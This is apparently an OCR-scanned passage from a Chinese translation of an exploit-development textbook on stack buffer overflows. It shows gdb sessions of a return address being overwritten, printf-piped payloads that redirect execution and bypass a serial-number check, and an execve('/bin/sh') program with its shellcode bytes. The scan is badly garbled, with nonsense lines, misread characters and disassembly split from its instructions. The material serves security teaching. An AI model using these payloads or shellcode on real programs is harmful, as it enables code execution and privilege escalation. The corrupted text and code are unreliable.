shellcoders@debian:~/chapter_2$ ./a.out 
134513712 


这 个 例子 显示 ， 当 C 没 有 提供 内 置 保护 机 制 时 ， 越 过 缓冲 区 范围 读 取 其 他 的 数据 是 非常 容易 
的 。 但 是 ， 当 输入 的 数据 超出 缓冲 区 的 范围 时 《这 是 非常 有 可 能 的 )， 会 发 生 什 么 呢 ? 我 们 尝试 
把 数据 写 到 缓冲 区 范围 之 外 ， 看 看 会 发 生 什 么 。 

int main () 

{ 

int array[5]; 
int i; 
for (i = 0; i <= 255; i++ ) 
{ 
array[i] = 10; 
} 
H 


这 次 ， 编 译 器 依然 没有 给 我 们 任何 警告 或 错误 信息 。 但 是 当 执 行 时 ， 进 程 却 月 演 了 
shellcoders@debian:~/chapter_2$ cc buffer2.c 


shellcoders@debian:~/chapter_2$ ./a.out 
Segmentation fault (core dumped) 


凭 以往 的 经 验 ， 我 们 可 以 推测 程序 员 在 编写 代码 的 过 程 中 ， 如 果 没 有 正确 使 用 缓冲 区 ， 在 编 
译 后 并 运行 这 个 程序 时 ， 程 序 通常 会 月 溃 或 没有 实现 预期 的 功能 。 在 这 个 时 候 ， 程 序 员 通常 会 重 
新 编辑 代码 ， 找 到 出 错 的 地 方 ， 并 修复 bug。 让 我 们 看 一 眼 gap 中 的 核心 转 储 。 

shellcoders@debian:~/chapter_2$ gdb -q -c core 

Program terminated with signal 11, Segmentation fault. 


#0 0x0000000a in ?? () 
(gdb) 


令 人 感 兴趣 的 是 , 我 们 看 到 程序 在 骨 江 时 ， 它 正在 执行 地 址 0x0000000a〔 用 十 进 制 表示 就 是 
的 指令 。 个 中 原因 会 在 本 章 的 后 面 加 以 介绍 。 
但 是 ， 请 等 一 下 ， 如 果 程 序 是 把 用 户 输入 的 数据 复制 到 缓冲 区 ; 或 者 ， 如 果 是 预期 从 其 他 可 
以 被 人 为 模拟 的 程序 (例如 TCP/IP 网 络 识别 客 户 端 ) 接收 输入 数据 ， 会 发 生 什么 呢 ? 

程序 员 在 编写 代码 时 ， 如 果 把 用 户 输 入 的 数据 复制 到 缓冲 区 ， 那 么 很 可 能 会 出 现 这 种 情形 : 
用 户 故意 提交 超出 缓冲 区 范围 的 数据 。 而 这 种 情形 可 能 会 导致 不 同 的 结果 ,包括 程序 崩溃 或 强制 
程序 执行 用 户 提 交 的 指令 等 。 我们 非常 关注 这 些 异常 的 情况 , 但 在 获得 程序 执行 流程 的 控制 权 之 
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前 ， 需 要 先 从 内 存 管 理 的 角度 了 解 怎样 溢出 栈 上 存储 的 缓冲 区 。 


22 $% 


BRED HOI, T LIFOSMGEAZIMI. AARADRT EPOR AAT. BUS 
上 去 的 会 被 第 一 个 拿 走 。 栈 的 边界 由 扩展 栈 指针 (ESP) 寄存 器 来 定义 ， 它 指向 栈 顶 。PUSH 和 POP 
是 两 条 专用 的 栈 指令 , 它们 通过 EsP 了 解 栈 位 于 内 存 的 具体 地 址 。 在 许多 硬件 体系 结构 里 (如 第 1 
章 提 到 的 IA32)，BsP 指 向 最 后 使 用 的 栈 地 址 。 在 其 他 的 硬件 体系 结构 里 ， 它 可 能 指向 第 一 个 空 
闲 的 地 址 。 

PUSH 把 数据 压 入 栈 ，PoP 把 数据 弹出 栈 。 这 两 条 指令 都 经 过 高 度 优化 ， 有 着 非常 高 的 执行 效 
率 。 让 我 们 观察 执行 PUSH 后 ， 栈 是 如 何 变 化 的 。 


push 1 





push addr var 
第 一 条 指令 把 1 压 入 栈 ， 第 二 条 指令 把 变量 vaR 的 地 址 压 入 栈 顶 。 两 条 指令 执行 后 ， 栈 的 布 
局 如 图 2-1 所 示 。 





地 址 | 值 





643410h | 变量 VAR 的 地 址 <— ESP 指 向 这 个 地 址 





643414h 11 | 





643418h | | 








图 2-1 把 数据 压 入 栈 


这 时 ，EszP 指 向 栈 项 , 地 址 是 643410h。 数 据 以 指令 执行 的 顺序 压 入 栈 , 因此 首先 压 入 的 是 1， 
然后 压 入 的 是 变量 vaRg 的 地 址 。 当 一 条 PUSH 执行 后 ，EsP 里 保存 的 地 址 将 减 去 4， 并 且 把 这 个 双 字 
节 数 据 写 到 ESP 保 存 的 新 地 址 里 。 

把 数据 保存 在 栈 上 ， 是 为 了 再 次 使 用 它 ， 这 要 通过 POP 指令 来 完成 。 继 续 上 面 的 例子 ， 从 栈 
上 取 回 我 们 的 数据 : 


pop eax 





pop ebx 

首先 ， 用 Pop 把 栈 顶 的 值 (ESP 所 指 处 ) 复制 到 Eax， 接 下 来 再 次 执行 PoP， 但 这 次 是 把 数据 
复制 到 EBX。 栈 现在 的 布局 如 图 2-2 所 示 。 

你 可 能 知道 ，PoOP 具 改变 EsP 的 值 ， 而 不 改写 或 删除 栈 上 的 数据 ， 它 只 是 把 栈 上 的 数据 复制 
到 操作 对 象 里 。 在 这 个 例子 里 ， 它 首先 把 变量 VAR 的 地 址 复制 到 EAX， 接 着 把 1 复制 到 EBX。 

另 一 个 与 栈 相关 的 寄存 器 是 EBP。EBP 保 存 栈 底 指针 ， 通 常 以 它 为 基 址 来 计算 其 他 的 地 址 ， 
我 们 把 它 称 为 “ 帧 指针 ”。 尽 管 可 以 把 EBP 当 作 通用 寄存 器 来 使 用 ， 但 在 历史 上 ，EBP 总 是 与 栈 操 
作 相 关 。 下 面 的 指令 把 EBP 作为 索引 : 


22 X 11 





mov eax, [ebp+i0h] 


这 条 指令 把 从 栈 底 向 下 偏 移 〈 记 住 ， 栈 向 下 增长 ) 16B《〈 用 十 六 进 制 表示 是 10h) 处 的 双 字 


地 址 | 值 





643410h | 变量 VAR 的 地 址 





643414h | ] 


643418h | < 一 BSP 指向 该 地 址 











图 2-2 ”从 栈 弹 出 数据 


函数 与 栈 

使 用 栈 的 主要 目的 是 为 了 更 有 效 地 使 用 函数 。 从 底层 看 , 函数 将 改变 程序 的 执行 流程 , 因此 ， 
一 条 指令 (或 一 组 指令 ) 可 以 (相对 程序 的 其 他 部 分 ) 单独 执行 。 更 重要 的 是 ， 函 数 执行 结束 后 ， 
将 把 控制 权 交还 给 它 的 调用 者 。 通 过 使 用 栈 ， 函 数 的 整个 调用 过 程 更 有 效率 。 

我 们 先 看 一 个 简单 的 例子 ， 重 点 观察 函数 怎样 使 用 栈 。 


void function(int a, int b) 


{ 


int array[5]; 











} 


main() 
{ 


function(1,2); 


printf("This is where the return address points"); 


} 

在 这 个 例子 里 ， 系 统 首先 会 执行 main 里 的 指令 ， 碰 到 函数 调用 时 ， 系 统 中 断 正 常 的 执行 流 
程 ， 进 行 函数 调用 前 的 处 理 ， 然 后 执行 function 里 的 指令 。 调 用 函数 的 整个 过 程 如 下 : 首先 把 
function 的 参数 a 和 pb 压 入 栈 ， 之 后 ， 系 统 调 用 函数 ， 把 函数 的 返回 地 址 〈 即 RET，RET 里 保存 的 
是 调用 函数 时 的 指令 指针 ETrP 的 地 址 ) 压 入 栈 〈 在 这 个 例子 里 ，printf ("This is where the 
return address points") 的 地 址 被 压 入 栈 )， 然 后 调用 函数 。 

系统 在 执行 function 指 令 之 前 首先 会 执行 prolog。prolog 在 栈 中 存储 一 些 值 ， 使 系统 更 好 地 
执行 函数 。 为 了 使 函数 可 以 引用 栈 上 的 数据 ， 必 须 改变 EBP 的 值 ， 把 EBP 的 当前 值 压 入 栈 。 而 函 
数 执行 结束 后 ， 为 了 计算 main 里 的 地 址 ， 我 们 又 要 用 到 原先 的 EBP 的 值 。 一 旦 EBP 的 值 被 压 入 栈 ， 
prolog 就 把 当前 栈 指针 ESP 复 制 到 EBP， 这 样 在 调用 函数 的 过 程 中 我 们 就 可 以 方便 地 引用 栈 地 址 
Te 
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接着 ，prolog 计 算 function 的 局 部 变量 所 需要 的 地 址 空间 和 栈 上 的 保留 空间 ， 然 后 从 ESP 减 
去 变量 的 大 小 ， 为 程序 保留 必要 的 空间 。 最 后 ，prolog 把 function 的 局 部 变量 (在 这 里 是 array) 
压 入 栈 ， 如 图 2-3 所 示 。 





低 内 存 地 址 ， 栈 顶 














B 
4 高 内 存 地 址 ， 栈 底 


图 2-3 ”调用 函数 后 的 栈 布局 


通过 这 个 例子 ， 你 应 该 对 函数 调用 怎样 使 用 栈 有 了 更 深入 的 理解 。 接 下 来 ， 我 们 将 从 汇编 的 
角度 学 习 这 个 例子 。 用 下 面 命令 编译 这 个 C 函 数 : 


shellcoders@debian:~/chapter_2$ cc -mpreferred-stack-boundary=2 -ggdb 





function.c -o function 

因为 我 们 想 让 编译 后 的 程序 支持 gdb 调 试 ， 因 此 ， 在 编译 时 使 用 了 -ggdapb 选 项 *。 我 们 还 应 该 
使 用 优先 栈 边界 选项 ， 因 为 它 将 使 栈 以 双 字 节 为 单位 递增 (或 递减 )， 否则 ，gce 将 对 栈 进行 优化 ， 
使 事情 变 得 更 复杂 。 用 gdb 加 载 编 译 后 的 程序 如 下 : 

shellcoders@debian:~/chapter_2$ gdb function 

GNU gdb 6.3-debian 

Copyright 2004 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General Public License, and you 


are 
welcome to change it and/or distribute copies of it under certain 
conditions. 

Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for 


details. 
This GDB was configured as "i386-linux"...Using host libthread db 


library "/lib/libthread db.so.1". 


(gdb) 


先 来 看 看 程序 是 怎样 调用 函数 function 的 。 反 汇编 main: 


(gdb) disas main 
Dump of assembler code for function main: 


0x0804838c <main+O>: push %ebp 
0x0804838d <main+1>: mov zesp, %ebp 
0x0804838f <main+3>: sub $0x8, esp 





D 建议 使 用 -g。 一 一 详 者 注 
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0x08048392 
0x0804839a 
0x080483al 
0x080483a6 
0x080483ad 
0x080483b2 
0x080483b3 


<main+6>: 

<main+14>: 
<main+21>: 
<main+26>: 
<main+33>: 
<main+38>: 
<main+39>: 


End of assembler dump. 


fE<main+6>Al<main+i4>f7, £ 
指令 把 RET (EIP) RAR (虽然 指令 没有 明显 地 显示 出 来 )。 接着，cal1 把 执行 控制 权 交 给 位 
Fox8048384Mfunctionm x. FLA: BG LS tunc ion BUE, 观察 当 控制 权 转 到 这 之 后 发 生 


了 什么 。 


(gdb) disas function 
Dump of assembler code for function function: 


0x08048384 
0x08048385 
0x08048387 
0x0804838a 
0x0804838b 


<function+0>: 
<function+l>: 
<functiont+3>: 
<function+6>: 


<function+7>: 


End of assembler dump. 

在 这 个 例子 里 ，function 的 功能 仅仅 是 初始 化 array， 并 没有 做 其 他 的 事情 ， 所 以 对 应 的 汇 
编 指令 比较 简单 ， 其 中 的 大 部 分 指令 是 函数 的 prolog 以 及 将 控制 权 交 还 给 main 的 代码 。 在 这 里 ， 
prolog 首 先 把 当前 帧 指针 EBP 压 入 栈 ; 在 <function+1> 处 ，prolog 把 当前 的 栈 指针 复制 到 EBP。 最 
后 , 在 <function+3> 处 ，prolog 在 栈 上 为 局 部 变量 array 留 出 足够 的 空间 。 在 这 个 例子 里 ，array 
的 大 小 是 5X4B (20B)， 但 系统 为 我 们 的 局 部 变量 分 配 了 0x20 (30B). 
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现在 , 你 应 该 了 解 了 系统 在 调用 函数 时 会 执行 哪些 操作 , 以 及 这 些 操作 会 对 栈 产 生 哪 些 影 响 。 
EAT, 我 们 将 会 看 到 当 过 多 的 数据 塞 入 缓冲 区 后 ,缓冲 区 上 将 会 发 生 哪些 变化 。 在 了 解 了 发 生 
这 些 变化 的 原因 后 , 我 们 就 可 以 学 习 那 些 令 人 兴奋 的 内 容 一 一 利用 缓冲 区 溢出 ， 并 获得 程序 的 执 


行 控制 权 。 


$0x2, 0x4 (Sesp) 

SOx1, ($esp) . 
0x8048384 «function» 
$0x8048500, ($esp) 
Ox80482b0 <_init+56> 


BR (0x1 和 0x2) 被 先后 压 入 栈 。 在 <main+21>，cal1 


push %ebp 


mov Sesp, tebp 
sub $0x20,%esp 
leave 

ret 





先 来 看 一 个 例子 ， 在 这 个 例子 里 ， 函 数 把 用 户 的 输入 读 入 缓冲 区 ， 然 后 输出 到 stdout。 


void return_input (void) 


t 


* char array[30]; 


gets (array); 
s\n", array); 


printf(" 


main() 








return input(); 


return 0; 


} 


这 个 函数 没有 限制 用 户 可 以 提交 多 少数 据 。 我 们 先 用 优先 栈 边界 选项 编译 程序 : 


shellcodersGdebian:-/chapter 2$ cc -mpreferred-stack-boundary-2 -ggdb 


overflow.c 


-o overflow 


运行 程序 ， 输入 一 些 数据 ， 观察 程序 的 运行 情况 。 当 第 一 次 运行 时 ， 输入 10 个 A。 


./overflow 


shellcoders@debian:~/chapter_2$ 


AAAAAAAAAA 
AAAAAAAAAA 


函数 直接 把 我 们 输入 的 数据 输出 了 , 一 切 正常 。 试 着 输入 40 个 字符 ,这 将 超出 缓冲 区 的 长 度 
并 覆盖 栈 上 的 其 他 数据 。 


shellcoders@debian:~/chapter_2s 


Segmentation fault 


(core dumped) 


./overflow 
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD 
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD 


不 出 所 料 ， 出 现 了 sesfault 错 误 。 但 是 为 什么 会 这 样 呢 ? 让 我 们 用 GDB 看 个 明白 。 
首先 ， 启 动 GDB: 


shellcoders@debian:~/chapter_2$ gdb ./overflow 


4A Freturn input () HR. RIRE gets () 的 地 方 和 gets () 返 回 的 地 方 设 置 斯 


点 : 


(gdb) disas 


return_input 


Dump of assembler code for function return_input: 


0x080483c4 
0x080483c5 
0x080483c7 
0x080483ca 
0x080483cd 
0x080483d0 
0x080483d5 
0x080483d8 
0x080483dc 
0x080483e3 
0x080483e8 
0x080483e9 


<return_input+0>: 
<return_input+l>: 
<return_input+3>: 
<return_input+6>: 


<return_input+9>: 


<return_input+12>: 
<return_input+17>: 
<return_input+20>: 
<return_input+24>: 
<return_input+31>; 
<return_input+36>: 
<return_input+37>; 


End of assembler dump. 


可 以 看 到 两 条 “调用 ”指令 ， 分 别 是 针对 gets () 和 printf() 的 。 在 函数 的 结尾 我 们 也 看 到 
了 “ret” 指 令 ， 因 此 ， 分 别 在 对 gets O 的 调用 及 “ret” 指 令 上 设置 断 点 : 


(gdb) 
Breakpoint 


break *0x080483d0 


1 at 0x80483d0: 


push 
mov 
sub 
lea 
mov 
call 
lea 
mov 
movi 
call 
leave 
ret 


file overflow.c, 


Sebp 
Sesp, tebp 
$0x28,%esp 


OxffffffeO(Sebp),Seax 
*Seax, (Sesp) 

0x80482c4 <_init+40> 
OxffffffeO(Sebp),€eax 
eax, 0x4 (esp) 
$0x8048514, (%esp) 
0x80482e4 <_init+72> 


line 5. 


(gdb) break *0x080483e9 


Breakpoint 2 at 0x80483e9: 


现在 ， 运 行 这 个 程序 ， 来 到 第 一 个 断 点 处 : 


(gdb) run 


Breakpoint 


Dump of assembler code for function main: 


0x080483ea 
0x080483eb 
0x080483ed 
0x080483f2 
0x080483£7 
0x080483£8 


1, 0x080483d0 in return_input 
gets (array); 


我 们 准备 看 一 下 栈 的 布局 怎么 样 ， 但 首先 看 一 下 main() 函数 对 应 的 代码 ; 


(gdb) disas main 


<main+0>: 
<main+1>: 
<main+3>: 
<main+8>: 
<main+13>: 
<main+14>: 


End of assembler dump. 
注意 , 位 于 调用 return_input () 指令 之 后 的 指令 的 地 址 是 ox080483f2。 让 我 们 看 一 下 栈 的 
情况 。 记 住 ， 这 是 在 对 gets () 的 调用 已 经 进入 return_input () 之 前 的 情形 : 


(gdb) x/20x $esp 


Oxbffffa98: 
OxbffffaaB8: 
Oxbffffab8: 
Oxbffffac8: 
Oxbffffad8: 


Oxbffffaad 
OxbffffacB8 
Oxbffffb24 
Oxbffffaf8 
Oxbffffb2c 


push 
mov 
call 
mov 
pop 
ret 


Sebp 
sesp, tebp 
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file overflow.c, line 7. 


() at overflow.c:5 


0x80483c4 «return input» 


$0x0, eax 
%ebp 


0x080482b1 
0x0804841b 
0x4014a8c0 
0x40030e36 
0x08048300 


0x40017074 
0x4014a8c0 
Oxbffffac8 
0x00000001 
0x00000000 


0x40017af0 
0x08048460 
0x080483£2 
Oxbffffb24 
0x4000bcd0 


记 住 ， 我 们 期 待 看 到 保存 的 EBP 和 保存 的 返回 地 址 (RET)。 为 了 看 得 更 清楚 一 些 ， 我 们 用 粒 
体 把 它们 在 转 储 代码 中 标识 出 来 了 。 你 可 以 看 到 保存 的 返回 地 址 正 指向 ox080483f2， 这 个 地 址 
位 于 调用 return_input () 之 后 的 main() 里 ， 这 正 是 我 们 所 期 待 的 。 现 在 继续 执行 这 个 程序 ， 输 
入 40 个 字符 的 字符 串 : 


(gdb) continue 


Continuing. 


AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD 
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD 


Breakpoint 2, 0x080483e9 in return input () at overflow.c:7 


7 H 


于 是 我 们 触发 了 第 二 个 断 点 一 一 在 return_input () 里 的 “ret” 指 令 ， 恰 好 在 函数 返回 前 。 
看 一 下 栈 上 现在 的 情形 ; 


(gdb) x/20x Oxbffffa98 


Oxbffffa98: 
Oxbffffaa8: 
Oxbffffab8: 


0x08048514 
0x42424141 
0x43434343 


Oxbffffaa0 
0x42424242 
0x44444343 


0x41414141 
0x42424242 
0244444444 


0x41414141 
0x43434343 
0244444444 
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Oxbffffac8: Oxbffffao0 0x40030e36 0x00000001 Oxbffffb24 

Oxbffffad8: Oxbffffb2c 0x08048300 0x00000000 0x4000bcd0 

仍 用 粗 体 把 保存 的 EBP 和 保存 的 返回 地 址 标识 出 来 了 。 注 意 ， 它 们 两 个 都 被 我 们 输入 的 字符 
串 中 的 字符 改写 了 ，0x44444444 是 “DDDD” 的 十 六 进 制 形 式 。 看 一 下 执行 这 条 “ret” 指 令 时 
会 发 生 什么 : 

(gdb) x/1i $eip 

0x80483e9 <return_input+37>: ret 

(gdb) stepi 

0x44444444 in ?? () 

(gdb) 

太 好 了 ! 我 们 意外 地 执行 了 在 字符 串 中 指定 的 地 址 处 的 代码 。 图 2-4 显 示 了 在 array 被 洲 出 后 
栈 的 情形 。 





低 内 存 地 址 ， 栈 项 







AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDD | 数组 〈30 个 字符 +2 个 填充 字符 ) 





EBP 





RET 


| 高 内 存 地 址 ， 栈 底 


图 2-4 ”数组 溢出 后 导致 改写 了 栈 上 其 他 的 数据 


用 32B 填 充 数 组 并 继续 执行 代码 。 我 们 改写 了 存储 EBP 的 地 址 ， 它 现在 是 包含 DDDD 的 十 六 
进 制 形式 的 双 字 节 。 更 重要 的 是 ， 我 们 用 另 一 组 pDDD 的 双 字 节 改 写 了 RET。 当 这 个 函数 退出 时 ， 
它 将 读 出 存储 在 RET 里 的 值 一 一 现在 是 0x44444444 (DDpD 的 十 六 进 制 形式 )， 并 试图 跳 到 这 个 地 
址 。 但 是 这 个 地 址 不 是 一 个 有 效 的 地 址 ,或 者 位 于 受 保护 的 地 址 空间 ， 所 以 程序 将 由 于 段 故障 而 
终止 。 
zb) EIP 

DLE, MAM RG MI ee Y WB, JEERPEPIDEBBSURETHOPNZE, Ke, 2H Meee 
RAJE. “4k, AIXAM PEMA AR, SAT, WRITE, WASP 
生 较 大 的 影响 ， 那 我 们 就 可 以 利用 溢出 进行 拒绝 服务 攻击 。 当 然 ， 在 这 里 这 个 程序 并 不 重要 ， 
此 我 们 应 继续 努力 ， 直 到 控制 程序 的 执行 流程 ， 或 控制 加 载 到 EIP 的 数据 ( 即 指令 指针 )。 

继续 前 面 的 例子 ， 这 次 用 精心 选择 的 地 址 代替 D。 这 些 地 址 将 写 入 缓冲 器 并 将 改写 保存 在 组 
冲 区 中 的 EBP 和 RET。 当 系统 从 栈 上 取出 RET 的 值 ?并 放 入 EIP 时 ， 这 个 地 址 指向 的 指令 将 被 执行 
这 个 过 程 揭示 了 应 该 怎样 控制 程序 的 执行 流程 

为 了 控制 程序 的 执行 流程 ， 首先 要 确定 使 用 什么 地 址 ， 在 这 里 ， 我 们 选择 调用 zetuzn_ input 











O 这 时 ，EIP 里 保存 的 应 该 是 我 们 选择 的 地 址 。 一 一 详 者 注 
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的 地 址 代替 返回 main 的 地 址 。 因 此 ， 启 动 gdb 寻 找 调 用 return_input 的 地 址 。 


shellcoders@debian:~/chapter_2$ gdb ./overflow 


(gdb) disas main 
Dump of assembler code for function main: 


0x080483ea «main-0»: push Sebp 

0x080483eb «main-1»: mov gesp, tebp 

0x080483ed <main+3>: call 0x80483c4 <return_input> 
0x080483f2 <main+8>: mov $0x0, eax 

0x080483f7 «main-13»: pop Sebo 

0x080483f8 «main-414»: ret 


End of assembler dump. 


dA TAE RAS AY HE 3 0x080483ed. 


n" 


———— M —»—————————————————————————————————— NE 


因为 0x080483ed 不 能 转换 成 标准 的 ASCII 字 符 , 因此 需要 找 一 个 方法 把 这 个 地 址 变 成 字符 输 
入 。 然 后 ， 可 以 获取 这 个 程序 的 输出 ， 并 把 它 填 到 缓冲 区 。 我 们 可 以 使 用 bash shell 的 printf 函 
数 ， 利 用 管道 把 printf 的 输出 重 定向 到 涪 出 程序 。 如 果 首 先 尝试 较 短 的 字符 串 ; 

ShellcodersGdebian:-/chapter 2$ printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCC" 

| ./overflow 


AAAAAAAAAABBBBBBBBBBCCCCCCCCCC 
shellcoders@debian:~/chapter_2$ 


RAH, HDB SPS GEM OI—3. WRAHA H return input O 的 地 址 改写 保存 的 
返回 地 址 : 

shellcoders@debian:~/chapter_2$ printf 

*" AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDD\ xed \x83\x04\x08" | ./overflow 


AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDÍ 
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDO 


注意 ,程序 两 次 返回 了 字符 串 。 我 们 成 功 地 使 程序 执行 了 所 选择 的 地 址 。 视 贺 ， 你 成 功 地 破 
解 了 你 的 第 一 个 漏洞 ! 
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尽管 本 书 剩 下 的 大 部 分 内 容 集中 在 在 目标 程序 里 执行 你 选择 的 代码 ， 但 有 时 并 不 需要 这 样 
做 。 对 攻击 者 来 说 ， 有 时 把 执行 路 径 重 定 向 到 目标 程序 的 不 同 的 部 分 一 般 就 足够 了 ， 就 像 我 们 在 
前 面 的 例子 里 看 到 的 那样 一 一 如 果 他 们 寻找 的 是 在 目标 程序 里 提升 特权 , 他 们 可 能 就 不 会 想 着 用 
套 接 字 窃 取 根 shell 权 限 。 许 多 防御 机 制 关 注 的 是 预防 程序 执行 “任意 ”代码 。 如 果 攻 击 者 能 简单 
地 重用 目标 程序 的 部 分 代码 来 达到 他 们 的 目标 的 话 ， 这 些 防御 措施 〈 例 如 ，N^X、Windows DEP) 
中 的 大 部 分 都 会 失效 。 
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让 我 们 设想 有 这 样 一 个 程序 ， 它 在 使 用 之 前 需要 你 输入 一 个 序列 号 。 假 设 这 个 程序 在 用 户 
输入 一 个 超 长 的 序列 号 时 会 发 生 核 溢出 。 我 们 可 以 通过 使 程序 在 输入 错误 的 序列 号 之 后 跳 到 
“正确 的 ”代码 段 来 生成 一 个 总 是 有 效 的 “序列 号 ” 这 个 “利用 程序 ”完全 遵循 前 一 节 介绍 的 
技术 ， 但 这 个 例子 说 明 在 一 些 真 实情 形 (尤其 是 认证 ) 里 ， 只 需 跳 到 攻击 者 选择 的 地 址 可 能 就 
EBT. 

下 面 是 这 个 程序 ; 


// serial.c 


#include <stdlib.h> 
#include <stdio.h> 
#include <string.h> 


int valid serial( char *psz ) 
( 
Size t len = strlen( psz ):; 
unsigned total - 0; 


size t i; 
if( len « 10 ) 
return 0; 
for( i = 0; i < len; i++ ) 
{ 
if(( psz[i] < '0' ) || ( pszflil > 'z' )) 
return 0; 


total += psz[i]; 
} 


if( total % 853 == 83 ) 
return 1; 


return 0; 


} 


int validate_serial() 
{ 


char serial[ 24 ]; 


fscanf( stdin, "%s", serial ): 


if( valid_serial( serial )) 
return 1; 

else 
return 0; 
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int do_valid_stuff() 

{ 
printf("The serial number is valid!\n"}; 
// do serial-restricted, valid stuff here. 


exit( 0 ); 





int do invalid stuff() 


( 
printf("Invalid serial number! \nExiting\n"); 


exit( 1 ); 
} 


int main( int argc, char *argv[] ) 
{ 
if( validate_serial() ) 
do valid stuff(); // 0x0804863c 
else 
do invalid stuff(): ` 


return 0; 
} 
如 果 编 译 这 个 程序 并 运行 它 , 可 以 看 到 它 接受 序列 号 作为 输入 并 (如 果 序 列 号 的 长 度 超过 24 
个 字符 ) 发 生 溢出 ， 就 像 前 面 的 程序 那样 。 
如 果 启 动 sqb， 就 可 以 找到 “序列 号 有 效 ” 的 代码 在 哪里 : 


shellcoders@debian:~/chapter_2$ gdb ./serial 


(gdb) disas main 
Dump of assembler code for function main: 
0x0804857a <main+0>: push %ebp 
0x0804857b «main*l»: mov sesp, tebp 
0x0804857d <main+3>: sub 50x8, %esp 
0x08048580 <main+6>: and SOxfffffffO,%esp 
0x08048583 <maint9>: mov $0x0, teax 
0x08048588 <main+14>: sub %eax, tesp 
0x0804858a <main+16>: call Ox80484£8 «validate serial» 
0x0804858f «main-21»: test eax, Seax 
0x08048591 <main+23>: je 0x804859a <main+32> 
0x08048593 <main+25>: call 0x804853e <do_valid_stuff> 
0x08048598 <main+30>: jmp 0x804859f <main+37> 
0x0804859a <main+32>: call 0x804855c «do invalid stuff» 
0x0804859f <main+37>: mov $0x0,*€eax 
0x080485a4 «main-42»: leave 
0x080485a5 <main+43>: ret 


从 上 面 我 们 可 以 看 到 调用 validate_serial 和 后 续 的 测试 ， 以 及 对 do_valid_stuff 或 


ao_invalia_stuff 的 调用 。 如 果 滋 出 缓冲 区 并 把 保存 的 返回 地 址 设 为 0x08048593， 就 能 绕 过 序 
列 号 检查 。 
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为 了 达到 此 目的 ， 再 次 使 用 bash 的 printf 功 能 ( 记 住 ， 因 为 [A32 机 器 是 little-endian 的 ， 所 以 
字 节 序 是 颠倒 的 )。 然 后 当 用 特别 选择 的 序列 号 作为 输入 来 运行 serial 时 ， 可 以 得 到 : 

shellcoders@debian:~/chapter_2$ printf 

" AAAAAAAAAABBBBBBBBBBCCCCCCCCAAAABBBBCCCCDDDD\ x93 \x85\x04\x08" | 


./serial 
The serial number is valid! 


mM TF, Fea) *HHHHHHHHHHHHH" (1305H) 也 可 以 工作 。( 但 我 们 这 个 方法 更 
有 意思 ， 不 是 吗 ? ) 


2.5 利用 漏洞 获得 根 特权 


现在 ， 该 利用 这 个 漏洞 做 些 事情 了 。 虽 然 把 overflow.c 要 求 的 一 次 输入 改 成 两 次 还 算 比 较 
酷 ， 但 你 总 不 会 告诉 你 的 朋友 :“ 嘿 ， 看 ， 我 让 一 个 只 有 15 行 的 小 程序 连续 要 求 两 次 输入 !” 不 ， 
我 们 想 要 的 比 这 更 酪 一 些 。 

这 类 的 溢出 一 般 会 被 用 来 获取 根 Cuia 00 特权 ， 我们 可 以 攻击 以 根 特权 运行 的 进程 来 达 
到 这 个 目的 。 如 果 进 程 以 根 运 行 ， 我 们 就 可 以 通过 溢出 强制 它 执行 shell， 而 这 个 shel 将 继承 根 
特权 ， 我 们 也 会 因此 而 得 到 根 shell。 时 至 今日 ， 本 地 溢出 变 得 日 益 流行 ， 因 为 越 来 越 多 的 网 络 
应 用 程序 不 再 以 根 特权 运行 ， 在 破解 它们 之 后 ， 你 必须 用 第 二 个 破解 〈 本 地 溢出 的 ) 程序 来 获 
得 根 权限 。 

当 我 们 破解 脆弱 的 程序 时 ， 可 做 的 不 仅仅 是 派生 根 shell， 后 续 章 节 介 绍 了 很 多 其 他 的 破解 方 
法 。 但 是 可 以 这 样 说 ， 派 生根 shell 仍 是 最 常见 、 也 是 最 易于 理解 的 破解 方法 。 

然而 ， 要 小 心 了 ， 因 为 派生 根 shell 的 代码 使 用 了 execve 系 统 调用 。 下 面 是 派生 shell 的 C 
代码 : 

// shell.c 


int main(){ 
char *name[2]; 


name[0] = "/bin/sh"; 
name[1] = 0x0; 
execve(name[0], name, 0x0); 
exit(0):; 


} 
编译 并 运行 它 ， 我 们 看 到 程序 派生 了 一 个 shell。 
[jackG0day local]$ gcc shell.c -o shell 


[jack@0day local]$ ./shell 
sh-2.05bt 


你 可 能 会 想 :“ 太 棒 了 ! 但 怎么 把 C 源 代码 插入 脆弱 的 缓冲 区 呢 ? 可 以 用 前 面 输入 字符 A 的 
方法 吗 ? ”答案 是 : 不 能 。 插 入 C 源 代码 比 插 入 字符 A 要 难得 多 ， 我 们 只 能 向 脆弱 的 缓冲 区 中 
插入 机 器 指令 (opcode)。 为 了 把 opcode 插 入 缓冲 区 , 必须 把 派生 shell 的 C 代 码 编译 成 汇编 指令 ， 
然后 从 可 读 的 汇编 指令 中 提取 opcode。 这 些 被 称 为 shellcode 或 opcode 的 代码 可 以 注入 脆弱 的 组 
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冲 区 ， 并 可 以 执行 。 但 是 ， 说 起 来 容易 做 起 来 难 ， 我 们 将 用 专门 的 章节 介绍 这 个 元 长 且 丈 手 的 
过 程 。 
在 这 里 ， 先 不 管 怎么 把 C 代 码 译 为 shellcode。 这 是 比较 麻烦 的 事情 ， 将 在 第 3 章 详细 介绍 。 
看 一 下 前 面 运 行 的 、 派 生 shell 的 C 代 码 的 shellcode 表 示 。 
"\xeb\xla\x5e\x31\xc0\x88\x46\x07\x8d\xle\x89\x5e\x08\x89\x46" 


"\x0c\xb0O\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xel" 
"\xff\xffi\xffi\x2f\x62\x69\x6e\x2£\x73\x68"; 
测试 一 下 ， 看 它 是 否 执行 C 代 码 同 样 的 功能 。 编 译 下 面 的 代码 段 ， 它 将 允许 我 们 执行 这 个 
shellcode: 
// shellcode.c 
char shellcode[] = 
